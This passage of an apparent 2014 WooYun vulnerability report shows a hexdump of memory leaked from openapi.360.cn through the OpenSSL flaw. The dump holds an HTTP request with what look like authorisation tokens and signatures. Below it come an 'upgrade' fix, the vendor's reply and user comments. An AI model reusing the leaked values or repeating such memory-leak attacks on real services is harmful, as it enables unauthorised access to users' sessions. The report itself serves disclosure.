  0190: 32 35 50 34 25 32 35 32 35 4F 36 25 32 35 32 35  25P4%2525O6%2525
  01a0: 4E 53 25 32 36 72 25 33 44 30 25 32 36 71 69 64  NS%26r%3D0%26qid
  01b0: 25 33 44 32 32 35 39 36 38 30 31 38 25 32 36 69  %3D225968018%26i
  01c0: 6D 25 33 44 31 5F 74 30 31 39 65 33 38 34 61 35  m%3D1_t019e384a5
  01d0: 32 64 62 38 62 39 63 37 66 25 32 36 73 25 33 44  2db8b9c7f%26s%3D
  01e0: 71 75 63 25 32 36 73 72 63 25 33 44 33 36 30 6D  quc%26src%3D360m
  01f0: 6F 62 69 6C 65 25 32 36 74 25 33 44 31 25 32 36  obile%26t%3D1%26
  0200: 6C 65 25 33 44 3B 54 3D 73 25 33 44 65 32 34 64  le%3D;T=s%3De24d
  0210: 34 65 36 61 33 30 30 38 61 32 62 31 30 64 61 37  4e6a3008a2b10da7
  0220: 33 36 31 34 33 39 30 30 65 38 31 32 25 32 36 74  36143900e812%26t
  0230: 25 33 44 31 33 39 35 38 33 31 34 35 39 25 32 36  %3D1395831459%26
  0240: 61 25 33 44 31 25 32 36 76 25 33 44 31 2E 30 25  a%3D1%26v%3D1.0%
  0250: 32 36 6C 6D 25 33 44 0D 0A 43 6F 6E 74 65 6E 74  26lm%3D..Content
  0260: 2D 4C 65 6E 67 74 68 3A 20 32 33 0D 0A 48 6F 73  -Length: 23..Hos
  0270: 74 3A 20 6F 70 65 6E 61 70 69 2E 33 36 30 2E 63  t: openapi.360.c
  0280: 6E 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B  n..Connection: K
  0290: 65 65 70 2D 41 6C 69 76 65 0D 0A 0D 0A 61 75 74  eep-Alive....aut
  02a0: 68 6F 72 69 7A 65 3D 73 64 6B 5F 62 79 5F 63 6F  horize=sdk_by_co
  02b0: 6F 6B 69 65 E9 64 C5 56 80 80 44 71 6D 8A 61 2E  okie.d.V..Dqm.a.
  02c0: 65 B5 7D 0F 8A F2 BD F2 07 07 07 07 07 07 07 07  e.}.............
  02d0: 66 42 69 53 41 72 6F 62 79 71 62 59 34 53 6D 34  fBiSArobyqbY4Sm4
  02e0: 4F 4D 73 35 25 32 42 4F 6E 43 4A 62 46 55 4B 48  OMs5%2BOnCJbFUKH
  02f0: 6F 49 4F 6F 38 73 4D 46 33 41 39 46 76 6E 58 6C  oIOo8sMF3A9FvnXl
  0300: 53 4D 30 46 6A 46 25 32 46 49 4E 66 78 4D 6D 6F  SM0FjF%2FINfxMmo
  0310: 39 62 4E 56 59 55 4F 54 46 65 51 4C 59 7A 25 32  9bNVYUOTFeQLYz%2
  0320: 42 73 33 30 6C 74 75 33 43 39 32 70 75 45 5A 4E  Bs30ltu3C92puEZN
  0330: 71 50 69 52 4E 30 64 34 4A 35 34 62 4C 59 6D 65  qPiRN0d4J54bLYme
  0340: 44 78 47 64 67 25 32 42 4D 77 71 35 6B 35 6D 5A  DxGdg%2BMwq5k5mZ
  0350: 71 71 69 44 44 68 33 41 4D 64 48 38 34 25 32 42  qqiDDh3AMdH84%2B
  0360: 42 46 4D 50 73 6D 6B 45 78 45 59 35 73 6C 75 76  BFMPsmkExEY5sluv
  0370: 77 46 59 42 75 39 49 31 48 64 39 35 4A 7A 36 6B  wFYBu9I1Hd95Jz6k
  0380: 6E 6E 4A 50 31 72 38 47 44 34 32 51 6C 34 38 57  nnJP1r8GD42Ql48W
  0390: 50 4F 62 25 32 42 34 43 50 66 4D 76 6A 67 31 37  POb%2B4CPfMvjg17
  03a0: 4C 56 57 47 58 41 35 6D 73 37 69 61 45 74 35 4A  LVWGXA5ms7iaEt5J
  03b0: 79 46 4B 44 6A 5A 25 32 46 36 33 4B 47 48 4F 45  yFKDjZ%2F63KGHOE
  03c0: 6D 5A 4E 50 77 55 77 33 67 42 4C 78 70 64 79 32  mZNPwUw3gBLxpdy2
  03d0: 52 6F 79 4B 56 41 63 69 55 78 67 67 41 48 62 36  RoyKVAciUxggAHb6
  03e0: 75 46 35 6B 65 73 25 32 46 48 59 64 67 4E 51 6B  uF5kes%2FHYdgNQk
  03f0: 35 50 25 32 42 67 67 6D 4A 7A 6F 44 47 34 70 6F  5P%2BggmJzoDG4po
  0400: 58 55 6D 71 32 37 4D 6C 78 74 39 70 5A 44 30 59  XUmq27Mlxt9pZD0Y
  0410: 36 67 25 32 42 50 44 71 44 41 4E 67 32 76 34 49  6g%2BPDqDANg2v4I
  0420: 56 79 6C 4B 79 46 59 46 55 6F 46 77 6A 71 47 6C  VylKyFYFUoFwjqGl
  0430: 33 35 68 63 5A 41 34 76 4F 39 75 37 54 47 44 52  35hcZA4vO9u7TGDR
  0440: 57 38 6E 71 44 6A 4B 67 78 74 6D 34 66 39 30 35  W8nqDjKgxtm4f905
  0450: 6C 73 78 45 47 54 4D 72 57 42 69 7A 78 76 58 42  lsxEGTMrWBizxvXB
  0460: 75 4D 4C 5A 69 35 6D 54 4D 52 52 31 35 25 32 46  uMLZi5mTMRR15%2F
  0470: 46 43 6F 44 4D 45 53 4D 48 69 30 4D 68 79 33 52  FCoDMESMHi0Mhy3R
  0480: 67 63 7A 6D 37 52 6A 50 45 44 39 51 25 33 44 25  gczm7RjPED9Q%3D%
  0490: 33 44 26 6B 3D 41 44 66 34 79 74 32 6F 5A 7A 46  3D&k=ADf4yt2oZzF
  04a0: 4D 79 54 6B 45 78 63 51 57 50 42 47 79 30 33 47  MyTkExcQWPBGy03G
  04b0: 53 39 41 30 69 48 53 4E 75 6C 42 33 64 72 67 36  S9A0iHSNulB3drg6
  04c0: 65 72 35 52 7A 4F 54 52 70 53 53 4D 54 75 55 33  er5RzOTRpSSMTuU3
  04d0: 6A 31 77 68 67 37 41 2D 41 4D 6A 32 41 67 4B 43  j1whg7A-AMj2AgKC
  04e0: 37 77 62 31 63 71 64 73 78 2D 33 66 75 4E 79 6D  7wb1cqdsx-3fuNym
  04f0: 5F 6E 7A 39 64 31 74 66 70 71 7A 34 48 6B 48 76  _nz9d1tfpqz4HkHv
  0500: 53 48 31 36 65 69 31 72 39 36 6B 46 33 53 63 78  SH16ei1r96kF3Scx
  0510: 56 2D 64 42 43 32 76 2D 75 4F 41 38 48 78 5A 52  V-dBC2v-uOA8HxZR
  0520: 6F 34 47 63 4C 32 2D 6C 70 55 71 54 7A 36 6C 37  o4GcL2-lpUqTz6l7
  0530: 34 2D 34 45 44 54 70 36 4D 74 5A 74 72 35 4F 61  4-4EDTp6MtZtr5Oa
  0540: 33 4C 42 61 59 32 45 34 45 5A 33 61 4E 76 42 6D  3LBaY2E4EZ3aNvBm
  0550: 77 4A 63 35 53 62 52 38 6F 49 75 64 59 43 48 65  wJc5SbR8oIudYCHe
  0560: 69 58 6E 53 36 4B 31 41 37 6F 62 4D 69 59 75 79  iXnS6K1A7obMiYuy
  0570: 54 62 61 52 51 7A 41 76 64 4B 36 6D 5A 77 74 64  TbaRQzAvdK6mZwtd
  0580: 58 74 43 39 68 7A 61 5F 6B 41 52 5F 58 5F 32 6B  XtC9hza_kAR_X_2k
  0590: 53 35 35 49 6B 32 78 43 35 2D 71 63 6D 49 70 35  S55Ik2xC5-qcmIp5
  05a0: 47 69 67 5A 36 4F 49 31 59 74 39 6A 76 52 67 77  GigZ6OI1Yt9jvRgw
  05b0: 47 64 6D 59 37 6C 57 71 74 62 41 57 4D 56 70 41  GdmY7lWqtbAWMVpA
  05c0: 56 48 33 58 32 65 5F 44 49 73 57 30 32 64 38 77  VH3X2e_DIsW02d8w
  05d0: 77 44 78 62 73 44 70 45 67 4C 76 6D 50 50 61 59  wDxbsDpEgLvmPPaY
  05e0: 68 45 55 64 61 31 30 53 6F 72 71 73 25 33 44 8A  hEUda10Sorqs%3D.
  05f0: D5 92 84 D2 2A 2B 3C 07 3F 6C B9 1A B3 CD A7 65  ....*+<.?l.....e
  0600: 4E E0 66 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  N.f.............
  0610: 63 BE 58 97 22 9E D7 34 59 06 06 06 06 06 06 06  c.X."..4Y.......
  0620: 32 74 6C 76 42 4A 4F 46 45 37 4E 43 5A 46 75 4E  2tlvBJOFE7NCZFuN
  0630: 61 2D 57 6B 33 68 5A 36 38 61 4A 48 33 52 75 76  a-Wk3hZ68aJH3Ruv
  0640: 59 6F 6D 39 46 36 63 68 4C 48 53 64 33 34 61 67  Yom9F6chLHSd34ag
  0650: 25 33 44 BC 03 7C EE 39 96 E8 5D 24 EA 5A 67 D6  %3D..|.9..]$.Zg.
  0660: 52 E0 15 59 4A C4 2F 08 08 08 08 08 08 08 08 08  R..YJ./.........
  0670: 49 F6 BC 94 DE B7 BF C3 EF D2 D4 C6 79 EA 07 51  I...........y..Q
  0680: 30 4F D9 52 E5 C0 3F 83 FE C9 D9 1F 60 45 7C 6B  0O.R..?.....`E|k
  0690: BF FA 88 40 2D CF 30 4F 4D 84 C4 E7 BD 84 EC 3A  ...@-.0OM......:
  06a0: 67 08 0D FB 57 FC AA AD A2 55 BC 8D 44 C0 4A 45  g...W....U..D.JE
  06b0: 5B 00 D1 5E 31 DE 04 7B 2D D0 50 1E 28 25 EE 16  [..^1..{-.P.(%..
  06c0: E9 C1 8D 64 0C 38 F0 0B D0 AE 63 DD F7 9D 90 8E  ...d.8....c.....
  06d0: 91 5A 13 DE CF 91 1C 4F EF 2A 46 EF C8 96 42 6B  .Z.....O.*F...Bk
  06e0: 78 0B 36 F0 2E 3E F0 35 EE A9 9B D8 1C 6E 4F DB  x.6..>.5.....nO.
  06f0: 40 E8 FE 03 C6 4F C3 4A 3D 92 3B A5 0D 56 40 AF  @....O.J=.;..V@.
  0700: 8E BD 36 F2 6C 00 B2 FE 2B 3C 1D F4 39 13 05 BD  ..6.l...+<..9...
  0710: AE 04 FA E9 4B E7 80 A8 21 95 8E 51 2F 33 76 22  ....K...!..Q/3v"
  0720: D7 0E 4C AE 9A C4 83 D4 02 F1 EB F2 50 32 E8 27  ..L.........P2.'
  0730: 45 B0 D4 C8 11 00 B4 45 39 E8 FD 06 13 D9 75 5C  E......E9.....u\
  0740: FA E8 E7 E0 C4 CA 05 EB 43 B5 AF D4 8F F8 C6 69  ........C......i
  0750: 74 4B 07 77 39 24 97 4B 75 5A E0 85 7C FA 2F 87  tK.w9$.KuZ..|./.
  0760: 0D 83 68 77 F2 0C 95 6D 98 A1 73 D8 96 60 0E F6  ..hw...m..s..`..
  0770: 95 99 02 42 11 F1 4B 0C A0 1C 97 3C A8 EB 65 1D  ...B..K....<..e.
  0780: C3 2D 5B AC DD 3D 66 62 63 35 36 62 65 37 61 33  .-[..=fbc56be7a3
  0790: 35 34 30 31 62 37 63 38 30 33 62 36 63 63 35 33  5401b7c803b6cc53
  07a0: 31 34 38 32 66 31 26 73 69 67 6E 5F 74 79 70 65  1482f1&sign_type
  07b0: 3D 6D 64 35 26 73 72 63 3D 51 68 6F 70 65 6E 73  =md5&src=Qhopens
  07c0: 64 6B 2D 31 2E 30 2E 30 25 33 42 64 65 66 61 75  dk-1.0.0%3Bdefau
  07d0: 6C 74 26 73 74 3D 25 37 42 25 32 32 75 69 25 32  lt&st=%7B%22ui%2
  07e0: 32 25 33 41 25 32 32 31 25 32 32 25 32 43 25 32  2%3A%221%22%2C%2
  07f0: 32 74 25 32 32 25 33 41 37 37 38 31 37 25 37 44  2t%22%3A77817%7D
  0800: EA BB 12 53 DA 15 A5 75 5D 50 FD 61 21 6F B2 D5  ...S...u]P.a!o..
  0810: 69 7A DA B1 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B  iz..............
  0820: CB 91 5C 69 18 C2 4E 9F 73 4E E3 4B 03 23 F3 3C  ..\i..N.sN.K.#.<
  0830: DD 0C 5D 6E C7 9F 5C 46 AC 98 B1 5F 8E E3 22 18  ..]n..\F..._..".
  0840: 83 FE 9D 67 80 20 6A 0F 58 40 3B E1 10 56 E3 04  ...g. j.X@;..V..
  0850: AD E9 32 7F 0D 2D 55 10 AC 81 CC FA C0 05 FF 50  ..2..-U........P
  0860: 14 94 76 4A 9A FE 6F 10 BC F5 DE 7A 01 12 7C 9B  ..vJ..o....z..|.
  0870: 21 AB DB 5B A7 30 F2 63 B4 B8 A4 F2 44 99 16 F5  !..[.0.c....D...
  0880: C3 18 27 26 76 39 CE 9F 24 F4 58 2F E0 36 13 F4  ..'&v9..$.X/.6..
  0890: DC 8C 4A 56 82 E5 FB 0A 35 CA 4F 1C D1 F1 CB 8F  ..JV....5.O.....
  08a0: FB DE 28 EE FD EF 64 D5 E4 6F A6 BD 32 7F 7D 42  ..(...d..o..2.}B
  08b0: 33 DE 8B AA E6 41 80 61 98 55 B5 6B 5A 0B 2A 45  3....A.a.U.kZ.*E
  08c0: C4 C8 E4 3E 01 FB 5F FF F3 02 E0 5F 05 44 4D 27  ...>.._...._.DM'
  08d0: 61 BA B4 34 8B 53 5C 01 CE 03 03 A0 C4 79 7B DF  a..4.S\......y{.
  08e0: 5F D9 1D 02 D9 84 E8 31 F3 42 3D A1 9E 1D 39 07  _......1.B=...9.
  08f0: A4 03 2E CF E0 16 82 94 84 F4 36 3C B8 7D 72 7A  ..........6<.}rz
  0900: 9A 75 8E 93 EC 28 93 91 12 D3 87 F6 7D 0A 6F B4  .u...(......}.o.
  0910: 7C 0F 62 C0 A4 D9 67 EA 1F DB 64 5D E6 EA 69 C7  |.b...g...d]..i.
  0920: 19 88 B5 97 30 17 03 01 00 20 F3 AE 8B 32 19 99  ....0.... ...2..
  0930: B4 DB 69 CA DA 43 C7 82 63 D4 9A 5D 7B 02 2A 44  ..i..C..c..]{.*D
  0940: 5D 98 03 74 7D 71 98 9E 84 90 C2 5E 78 FD 7B C2  ]..t}q.....^x.{.
  0950: 3C 44 45 02 6C 5E 01 FF 8E D2 DE 99 89 F8 68 68  <DE.l^........hh
  0960: F0 A9 B1 69 18 63 29 46 45 6E 16 C8 74 7B F2 1A  ...i.c)FEn..t{..
  0970: 5E C2 7C C2 67 D5 5D 73 68 30 56 D0 22 21 C9 99  ^.|.g.]sh0V."!..
  0980: 52 B7 A1 7D 8B 9B C3 34 9E FA 92 10 F2 08 95 95  R..}...4........
  0990: 96 0F 5B 08 34 84 EF 22 D7 69 A3 AF E1 A4 29 33  ..[.4..".i....)3
  09a0: 2B 89 B5 41 7E 20 D7 58 39 9F A8 D0 89 90 BE 87  +..A~ .X9.......
  09b0: 75 36 13 E7 57 8E 92 85 02 FE A3 C6 F5 62 4D B9  u6..W........bM.
  09c0: B6 99 B5 A5 2B 40 44 C1 C9 DD D1 8D FD F7 6D 01  ....+@D.......m.
  09d0: 6A 36 16 AE 88 3F 3F 06 C7 2E 2A FA 57 90 F8 33  j6...??...*.W..3
  09e0: 80 41 7F 05 B1 BF 02 F4 8F 60 F2 8F 82 6F F0 C5  .A.......`...o..
  09f0: 2B 2B 98 B9 99 D9 3B 59 03 FE EA 82 FD CF 76 7F  ++....;Y......v.
  0a00: 1D A8 9B 79 3B B9 BB 89 3C B0 F9 A3 E0 FC 0F 00  ...y;...<.......
  0a10: 88 E8 DB 58 7A 5A 22 B5 91 96 56 96 48 4B C7 27  ...XzZ"...V.HK.'
  0a20: BF E7 43 40 17 2A CA 21 17 37 4B 5C 6E F4 8F 6C  ..C@.*.!.7K\n..l
  0a30: AF DF 15 00 62 87 88 02 40 7F FF D8 A1 E2 E2 62  ....b...@......b
  0a40: E2 EC 56 D7 FE 36 51 28 FB 5F 67 1C FF 32 30 44  ..V..6Q(._g..20D
  0a50: 54 02 0A BA 64 50 89 7F D9 9F 0A 87 88 5D 34 10  T...dP.......]4.
  0a60: F8 A2 81 41 E2 50 F0 C5 3E 44 41 70 09 F1 8B 06  ...A.P..>DAp....
  0a70: 06 8B 5E CA 13 83 40 24 2E 18 18 0E 86 C2 2E F6  ..^...@$........
  0a80: 0B 01 41 21 17 4D EC F7 D6 97 F2 C4 40 D0 0B 26  ..A!.M......@..&
  0a90: 2A 01 17 97 B8 6C 30 F0 45 83 81 E0 B0 4B F6 FB  *....l0.E....K..
  0aa0: 05 2F 99 28 F4 72 1E 54 4C FC 82 41 C4 C4 44 45  ./.(.r.TL..A..DE
  0ab0: 2F 19 08 74 D9 C4 2F 3E 17 51 10 04 0A 11 BB 64  /..t../>.Q.....d
  0ac0: 60 A8 F8 25 83 41 60 17 4C 1C 22 0A 93 B8 68 62  `..%.A`.L."...hb
  0ad0: 30 31 C8 A5 3C 31 38 F8 E2 58 42 45 45 C5 2F 8D  01..<18..XBEE./.
  0ae0: 2F 1C 7C C9 A0 E2 D0 CB E3 FB FB 1D 5E 1A 5F B0  /.|.........^._.
  0af0: 04 EC A2 41 C0 30 F0 25 03 C1 2F 99 38 48 02 7E  ...A.0.%../.8H.~
  0b00: 69 6E C0 E1 97 0D 06 BA 68 62 20 28 FC F2 1C 87  in......hb (....
  0b10: FD 73 1E B8 21 CD 7E DF D6 81 FC 73 A9 3D B0 41  .s..!.~....s.=.A
  0b20: 59 FE B1 8E 44 54 1D AD 9C D8 45 FF 5A C6 BA 4E  Y...DT....E.Z..N
  0b30: 4E 6E EC E0 BF FE AB 2A 22 A4 44 E5 41 0A 70 39  Nn.....*".D.A.p9
  0b40: E8 EF 8F 48 19 22 2F 27 AF 20 01 15 87 40 C4 14  ...H."/'. ...@..
  0b50: 61 8A 20 05 18 58 5E 5E 5E FA FF 33 FE 7C 99 B8  a. ..X^^^..3.|..
  0b60: BA 99 21 DD FE 5C BB BF DF 12 1C 24 06 E0 E2 52  ..!..\.....$...R
  0b70: D2 52 06 FC 06 50 4B 03 04 14 00 00 00 00 00 CF  .R...PK.........
  0b80: 95 79 44 00 00 00 00 00 00 00 00 00 00 00 00 09  .yD.............
  0b90: 00 00 00 6A 61 76 61 2F 73 72 63 2F 50 4B 03 04  ...java/src/PK..
  0ba0: 14 00 00 00 00 00 CF 95 79 44 00 00 00 00 00 00  ........yD......
  0bb0: 00 00 00 00 00 00 0F 00 00 00 6A 61 76 61 2F 73  ..........java/s
  0bc0: 72 63 2F 71 69 68 6F 6F 2F 50 4B 03 04 14 00 00  rc/qihoo/PK.....
  0bd0: 00 00 00 CF 95 79 44 00 00 00 00 00 00 00 00 00  .....yD.........
  0be0: 00 00 00 14 00 00 00 6A 61 76 61 2F 73 72 63 2F  .......java/src/
  0bf0: 71 69 68 6F 6F 2F 6D 73 64 6B 2F 50 4B 03 04 14  qihoo/msdk/PK...
  0c00: 00 00 00 08 00 FA 90 6A 44 C9 67 5B 2A DE 04 00  .......jD.g[*...
  0c10: 00 32 0E 00 00 1C 00 00 00 6A 61 76 61 2F 73 72  .2.......java/sr
  0c20: 63 2F 71 69 68 6F 6F 2F 6D 73 64 6B 2F 50 61 79  c/qihoo/msdk/Pay
  0c30: 2E 6A 61 76 61 B5 56 59 AB D3 40 14 7E AE E0 7F  .java.VY..@.~...
  0c40: 18 F3 94 48 49 15 C1 07 AB A2 62 C5 BA 5D B1 2A  ...HI.....b..].*
  0c50: 88 48 19 D3 69 3B 9A 26 71 32 B9 5A 54 50 11 37  .H..i;.&q2.ZTP.7
  0c60: 5C 41 41 45 11 77 F1 41 11 14 1F 7C F0 CF D8 78  \AAE.w.A...|...x
  0c70: FD 17 9E D9 B2 B5 75 01 BD DC 86 E4 9C EF EC CB  ......u.........
  0c80: 4C 63 E5 CA E5 CB D0 4A 24 1E 0D 78 2E 5F 16 61  Lc.....J$..x._.a
  0c90: EF 38 1E 10 74 82 0E C3 D0 1D C5 BD E3 4D 41 A6  .8..t........MA.
  0ca0: A3 28 64 1C 1D C3 8B D8 A5 A1 DB 5E 68 9D F2 48  .(d........^h..H
  0cb0: C4 69 18 34 CB CC 84 53 DF DD CC 18 1E EF A2 31  .i.4...S.......1
  0cc0: 9F CB 8C 67 71 B6 E3 78 B8 1B 47 B3 58 6D 4E 18  ...gq..x..G.XmN.
  0cd0: E6 21 CB 79 01 E1 EE 88 06 B4 47 16 DD 63 71 18  .!.y......G..cq.
  0ce0: B8 3B 3A 0B 7B 16 8E 1E 23 1E FF 05 28 C2 2C 26  .;:.{...#...(.,&
  0cf0: 4C 62 F7 CA D7 DF 63 25 6E 3A 5C 95 21 00 8D 71  Lb....c%n:\.!..q
  0d00: 14 01 68 BC 39 8A DA 01 B8 D9 C7 1E 69 CA 54 26  ..h.9.......i.T&
  0d10: 47 7D EA 21 CF C7 71 8C 00 80 4E 0B 6A 2D 62 74  G}.!..q...N.j-bt
  0d20: 11 73 82 62 8E 39 B0 FB 34 C0 3E EA 70 46 83 01  .s.b.9..4.>.pF..
  0d30: 3A D8 DA D7 DE 76 A8 7B 60 DF 2E B4 01 59 43 CE  :....v.{`....YC.
  0d40: A3 75 8D 86 28 82 3B 0A 8F 52 9F 8C DC 35 6B 57  .u..(.;..R...5kW
  0d50: B9 5E D0 00 B3 8D 90 F5 08 EB 2E 12 46 FB 63 E9  .^..........F.c.
  0d60: B1 D5 FC 13 F5 ED D6 56 A1 5C CA 51 D2 2B 0A 19  .......V.\.Q.+..
  0d70: 5C 17 42 DA 49 C6 73 38 1D E2 31 C2 8B CC 4A F4  \.B.I.s8..1...J.
  0d80: A8 1B 49 82 80 CC 50 41 18 0B D9 EE 78 20 BC 10  ..I...PA....x ..
  0d90: D6 01 A2 52 25 F4 D8 55 5D 4A 95 23 92 57 AB F1  ...R%..U]J.#.W..
  0da0: 21 8D 5D AD 1D C4 B5 99 8C A3 FD CE 38 EE 80 F0  !.].........8...
  0db0: CD 92 64 3B 39 2A 8F A1 0C 34 54 85 3D 2B 1D 93  ..d;9*...4T.=+..
  0dc0: 03 52 83 09 99 BC B8 F8 FD F6 A5 6F 5F 6E 42 01  .R.........o_nB.
  0dd0: 96 BE 5E 4E 1F BF FC FE F0 62 7A F7 FD B7 2F F7  ..^N.....bz.../.
  0de0: 97 DE 3D 9B DC B8 F7 E3 DC C3 EF 4F 5E 2E BD FF  ..=........O^...
  0df0: 9C 7E B8 A0 44 36 41 03 E1 11 92 CF 58 93 40 7D  .~..D6A.....X.@}
  0e00: C2 02 24 BF 1A 59 E0 26 35 11 0B 3D 12 C7 FB C8  ..$..Y.&5..=....
  0e10: 89 84 C4 DC D6 F3 B0 5E 71 EB 1A B5 51 6B 94 29  .......^q...Qk.)
  0e20: 11 41 D1 3E B2 57 A8 C8 68 7C 10 FB B4 67 14 68  .A.>.W..h|...g.h
  0e30: A0 4A 9E 00 6A 5C 56 02 97 C6 AD 51 C4 21 3D 8E  .J..j\V....Q.!=.


2E68028E-B4B9-41F0-99EC-001BB9E93588.png

修复方案:

升级吧。

版权声明:转载请注明来源 马燕羊蝎子@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-04-10 20:06

厂商回复:

感谢反馈。此openssl漏洞问题在4月8日中午已通过其他渠道获悉。并于当天下午紧急修复。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-04-08 16:29 | hack ( 路人 | Rank:28 漏洞数:2 )

    前排!观望~!

  2. 2014-04-08 16:50 | 帅气凌云 ( 普通白帽子 | Rank:314 漏洞数:60 | 弱点扫描{Www.VulScan.CN} 为网站健康检查...)

    前排占座 出售板凳 毛毯 瓜子 花生 雪碧

  3. 2014-04-08 17:37 | wangbing86 ( 路人 | Rank:2 漏洞数:1 | 慢慢学习路)

    刷Rank神器。。。。

  4. 2014-04-10 09:33 | rootnmxx ( 路人 | Rank:5 漏洞数:1 )

    求方法

  5. 2014-04-10 21:46 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    360又流氓了

  6. 2014-04-11 09:26 | 随时回来 ( 实习白帽子 | Rank:41 漏洞数:11 | 今年收成不好,喂的猪一点都没长,明早还得...)

    @xsser 我提交的银泰网和走秀网 也是这样的截图 为何我的审核部通过····哎····

  7. 2014-04-11 10:55 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @随时回来 @finger

  8. 2014-04-11 11:23 | 随时回来 ( 实习白帽子 | Rank:41 漏洞数:11 | 今年收成不好,喂的猪一点都没长,明早还得...)

    @xsser @@finger 哎,本来那天曝出openssl漏洞想刷WB的,心想想估计又得大半年了审核,就先提交两个看看,为什么我说很难审核?去年曝出的struts2漏洞,貌似是7月份提交的,我刷了十几个,今年年初还没审核,都大半年了,我微博@乌云了才有人审核···可是漏洞早已不在····(默默吐槽而已)

  9. 2014-04-11 13:23 | 马燕羊蝎子 ( 实习白帽子 | Rank:83 漏洞数:10 | 亲,啥时候请吃马燕羊蝎子。)

    无耻

  10. 2014-05-13 22:22 | 从容 ( 普通白帽子 | Rank:221 漏洞数:75 | Enjoy Hacking Just Because It's Fun :) ...)

    @随时回来 每天需要审核的洞太多了,就积压在下面了